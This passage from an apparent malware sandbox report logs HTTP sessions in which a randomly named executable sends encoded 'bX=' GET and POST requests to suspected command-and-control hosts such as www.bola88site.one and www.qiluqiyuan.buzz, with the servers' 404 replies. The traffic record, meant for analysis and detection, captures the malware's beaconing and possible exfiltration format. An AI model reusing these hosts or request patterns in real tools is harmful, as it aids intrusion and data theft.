                              Data Raw: 62 58 3d 31 49 39 71 4e 58 37 56 4c 47 44 72 51 74 79 66 2f 61 45 61 4c 63 48 4e 38 4e 4e 2b 53 72 65 79 6b 6f 79 6d 34 4c 6f 4e 63 7a 64 4e 47 6d 65 30 43 37 66 74 31 78 47 38 75 76 4e 75 4f 7a 62 58 41 31 42 79 6c 77 57 78 67 48 75 59 44 78 33 39 2b 4d 78 41 4f 4f 59 43 45 71 74 34 47 2b 78 58 30 7a 65 77 78 51 43 78 50 44 6c 31 7a 4d 62 70 6a 64 2b 34 51 4e 31 6a 30 49 42 64 45 34 37 62 6a 39 36 37 6e 73 37 34 41 6b 33 6a 42 7a 62 79 7a 47 33 48 55 2f 77 6b 46 4a 38 45 58 39 51 31 66 6e 46 49 43 78 53 2b 76 55 75 69 39 51 74 52 6b 79 54 56 58 54 41 61 34 67 4e 6b 51 5a 74 6d 38 72 37 54 2f 61 4e 51 4f 6a 7a 30 4c 61 2b 32 6d 78 69 78 44 2b 35 30 75 76 70 4a 30 75 64 32 39 65 49 62 46 35 4d 78 58 56 6f 38 6c 37 78 6a 49 78 63 66 2b 74 42 74 57 68 6d 64 73 75 70 45 5a 6d 64 50 61 35 71 65 4f 77 73 74 75 34 37 35 33 63 48 65 30 68 74 79 6a 47 62 69 50 32 51 6f 42 62 56 67 41 46 68 52 45 65 65 33 62 6c 66 39 77 4e 45 42 31 55 59 36 6d 72 33 52 79 39 65 2f 78 59 7a 65 62 4e 32 52 76 43 48 59 39 6d 70 [TRUNCATED]
                              Data Ascii: bX=1I9qNX7VLGDrQtyf/aEaLcHN8NN+Sreykoym4LoNczdNGme0C7ft1xG8uvNuOzbXA1BylwWxgHuYDx39+MxAOOYCEqt4G+xX0zewxQCxPDl1zMbpjd+4QN1j0IBdE47bj967ns74Ak3jBzbyzG3HU/wkFJ8EX9Q1fnFICxS+vUui9QtRkyTVXTAa4gNkQZtm8r7T/aNQOjz0La+2mxixD+50uvpJ0ud29eIbF5MxXVo8l7xjIxcf+tBtWhmdsupEZmdPa5qeOwstu4753cHe0htyjGbiP2QoBbVgAFhREee3blf9wNEB1UY6mr3Ry9e/xYzebN2RvCHY9mpyEnmN0n2nmDczAeGzySG1zQd2HOYKjVEnoVBh9Je70bU40tx+QnsckfnGvWvBd5XC5lGDc9TIB9LDqmhBV5eJ0925Q1qvDDKm/VF3zoWp5DliNXrX9IVIw0ztkDERcL2KWnzCtUbleoQiILJWGgOzGJ+C4hnT8/Z7RZvU/HHy6QXgIelGXBitoGcQut6dNluDwEuDnV0NAJCJbBNImZ5fgPMWmzkbHqEqvEXmPkHcDyePKTYDv1St2i5+hrpt7lkx1xP98QBbgqK5GMjKjUuyxVQF22myG5KSCgTJdzxVatiLnZw3LRuPyRuQ13oe7B2H4QbvPj/CYd7/qzVyvz+nNn4gI2NOIyzllEi0KlPobz/aipCDIqtAEQXCZ1TosOrcU1Jd5rTOhXs9wKEoXbd+YSc3Bdt3SaHyd/uGZKwkudCM3of9MTgnMHjuxe2dky0g37EV+kogyKybnnlcTVvHdZy+9Qm2difLxF7Upj6J+vba3KyQA88loB8ew6dV4PGRz2aoLBvPMAPO32++ERBjbEaU7Gftcim6apcQvV1VCF74anBctzc5U8SRyRVfda5SOLz3WQbwpyhOWGnCVN6+1CYfEeDT89BHJjWewbuFkmW/OLfol3RT4t6fCzs+LU/AD+lLbp1GzuefG2vTK2p9wpdDho3Pfj1xG [TRUNCATED]
                              Sep 16, 2024 09:31:21.090826988 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:21 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Sep 16, 2024 09:31:21.090842962 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.558669161.97.168.24580728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:23.043401957 CEST465OUTGET /wjff/?bX=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&RFRd_=tFLD HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Language: en-US,en
                              Host: www.qiluqiyuan.buzz
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Sep 16, 2024 09:31:23.649131060 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 16 Sep 2024 07:31:23 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 2966
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "66cd104a-b96"
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                              Sep 16, 2024 09:31:23.649144888 CEST224INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                              Sep 16, 2024 09:31:23.649156094 CEST1236INData Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                              Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                              Sep 16, 2024 09:31:23.649162054 CEST474INData Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                              Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.558670172.96.191.3980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:28.967771053 CEST730OUTPOST /3lkx/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Origin: http://www.bola88site.one
                              Referer: http://www.bola88site.one/3lkx/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 203
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 4b 64 39 47 63 59 61 4e 77 50 4d 6e 6d 30 62 6c 4a 73 73 69 7a 4c 5a 49 37 45 51 55 2b 79 32 71 73 41 6d 47 47 55 30 6f 47 47 2b 52 45 73 68 51 7a 6f 34 75 66 47 2f 73 4d 59 4b 2f 48 63 56 53 6f 67 6c 42 73 47 39 74 49 45 33 4c 77 71 61 2f 58 36 33 35 79 32 6b 67 38 2b 41 51 56 54 54 38 69 54 2b 4f 2f 73 77 73 33 33 34 34 79 44 78 78 70 42 67 61 66 62 42 66 4f 4f 2b 2b 32 4c 59 78 47 2b 6d 73 6c 36 71 51 36 49 44 72 66 4b 6b 4e 33 6c 49 5a 4d 76 38 4c 4b 61 48 66 48 49 71 68 6d 37 2b 49 78 6d 65 59 63 31 4d 51 62 53 2b 78 30 61 2b 66 51 34 30 79 4f 70 73 3d
                              Data Ascii: bX=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMv8LKaHfHIqhm7+IxmeYc1MQbS+x0a+fQ40yOps=
                              Sep 16, 2024 09:31:29.891184092 CEST1033INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:29 GMT
                              server: LiteSpeed
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.558671172.96.191.3980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:32.303944111 CEST750OUTPOST /3lkx/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Origin: http://www.bola88site.one
                              Referer: http://www.bola88site.one/3lkx/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 223
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 43 71 74 69 2b 47 55 6d 63 6f 54 47 2b 52 50 4d 68 66 74 59 34 6c 66 47 79 4d 4d 5a 32 2f 48 63 52 53 6f 69 74 42 76 31 6c 73 49 55 33 56 38 4b 61 35 59 61 33 35 79 32 6b 67 38 2b 6b 75 56 58 2f 38 6a 69 75 4f 2b 4e 77 76 70 6e 34 37 37 6a 78 78 74 42 67 65 66 62 42 70 4f 4b 32 59 32 49 77 78 47 36 69 73 6c 72 71 66 30 49 44 70 42 36 6b 44 6e 6c 74 46 56 4a 6f 31 4f 5a 71 75 57 5a 48 46 71 74 54 69 72 45 57 77 50 56 67 6f 4c 42 32 47 6c 71 66 32 4b 62 6b 43 51 2b 34 4c 32 65 50 71 70 47 50 77 2f 64 32 59 66 6e 36 78 48 4c 58 77
                              Data Ascii: bX=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+ACqti+GUmcoTG+RPMhftY4lfGyMMZ2/HcRSoitBv1lsIU3V8Ka5Ya35y2kg8+kuVX/8jiuO+Nwvpn477jxxtBgefbBpOK2Y2IwxG6islrqf0IDpB6kDnltFVJo1OZquWZHFqtTirEWwPVgoLB2Glqf2KbkCQ+4L2ePqpGPw/d2Yfn6xHLXw
                              Sep 16, 2024 09:31:33.234311104 CEST1033INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:33 GMT
                              server: LiteSpeed
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.558672172.96.191.3980728C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe
                              TimestampBytes transferredDirectionData
                              Sep 16, 2024 09:31:34.841780901 CEST1767OUTPOST /3lkx/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en
                              Host: www.bola88site.one
                              Origin: http://www.bola88site.one
                              Referer: http://www.bola88site.one/3lkx/
                              Content-Type: application/x-www-form-urlencoded
                              Connection: close
                              Content-Length: 1239
                              Cache-Control: max-age=0
                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                              Data Raw: 62 58 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 36 71 73 52 32 47 47 78 41 6f 42 32 2b 52 43 73 68 63 74 59 34 6b 66 47 71 41 4d 5a 36 46 48 66 35 53 71 48 35 42 75 41 4a 73 44 55 33 56 30 71 61 38 58 36 32 6a 79 32 30 6b 38 2b 30 75 56 58 2f 38 6a 68 6d 4f 6f 73 77 76 72 6e 34 34 79 44 78 31 70 42 67 36 66 64 70 35 4f 4b 79 75 33 34 51 78 42 65 47 73 6e 5a 79 66 38 49 44 76 41 36 6c 46 6e 6c 52 73 56 4e 4a 47 4f 5a 75 49 57 61 6e 46 70 6f 32 43 79 55 58 6d 61 57 30 79 4a 67 43 38 6e 74 44 56 4d 34 34 36 56 35 70 78 36 62 33 66 75 69 75 38 33 4e 6e 57 4a 79 6d 6b 56 75 4f 6f 6d 47 51 67 31 31 30 4a 4c 59 38 4d 41 33 4b 77 4d 54 65 56 6e 71 6b 4f 35 72 59 66 30 42 64 41 67 74 57 4d 6e 66 59 49 6c 57 6f 6b 4a 6d 62 74 4f 33 67 79 58 79 64 67 43 72 7a 2b 31 72 46 39 45 77 76 47 6c 45 57 64 70 44 36 58 65 65 66 42 38 41 72 77 30 2f 6c 55 57 4a 44 73 79 63 58 63 45 31 4e 6e 71 4f 64 59 71 43 42 36 42 53 43 66 30 55 75 [TRUNCATED]
                              Data Ascii: bX=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+A6qsR2GGxAoB2+RCshctY4kfGqAMZ6FHf5SqH5BuAJsDU3V0qa8X62jy20k8+0uVX/8jhmOoswvrn44yDx1pBg6fdp5OKyu34QxBeGsnZyf8IDvA6lFnlRsVNJGOZuIWanFpo2CyUXmaW0yJgC8ntDVM446V5px6b3fuiu83NnWJymkVuOomGQg110JLY8MA3KwMTeVnqkO5rYf0BdAgtWMnfYIlWokJmbtO3gyXydgCrz+1rF9EwvGlEWdpD6XeefB8Arw0/lUWJDsycXcE1NnqOdYqCB6BSCf0UuiX1O4FvFIbciGiRBgjTAmErpyGH83Y9FZMof5BIvV0QQR3cxN7pDBHVPuZRpp9f+RpL5I3OgVVP9zZvBE8n61cDkvFceI1cB4xHrhccPjCGVYUaYEjL8GMf8K35PiI/iBQxq04aPnmKScqUatmMxkqHSIFsVreYPxW3V76o8zxh8iPGxD0vj+vKUFL5C9qws2noIfKHsAnXLnjOLOzscuiAxjtO/oTi4tqLSyodxZi4BbicsjpXhd6NxHi87XE/ADKoXZZha/+gE6AgXuA+zG65HAvcPsRoG4zP9F46dW4TMiiuIEKCBvRUtW17tONy67uPOkLP0NPtWkKMYTrGAjVXrsZjytLTjOJ+5KaQpBL/7IL4w8sIzEg7LBya/JCFaEStYIVcMMRBt3sFbc9rm6P+8RJnMXBzvsJpOAWeOeQogaPglu5lACNkxaUsTQMR3xuWDbdNsTIzP2TSLM8Rq2MvzGQB6tqpbqpykn7s/mNGm27Kisl91T9ExzfCryf8zaJaSx7Qn9/DVVJUFxW4Q+BGXucMSUSvqeyBH5J/gGXT+sZCXlKFagPH8BkvmQCuiSdEH0qygpl+yFMamLWnmzaCOF3Aal0nJ+vGeXnqE7zUAbdaAqVYMRd40GQ07MxmD+ksRsD4S4SzUDQnFTfWu/qzGDV+iOmn1wF [TRUNCATED]
                              Sep 16, 2024 09:31:35.787333965 CEST1033INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 796
                              date: Mon, 16 Sep 2024 07:31:35 GMT
                              server: LiteSpeed
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
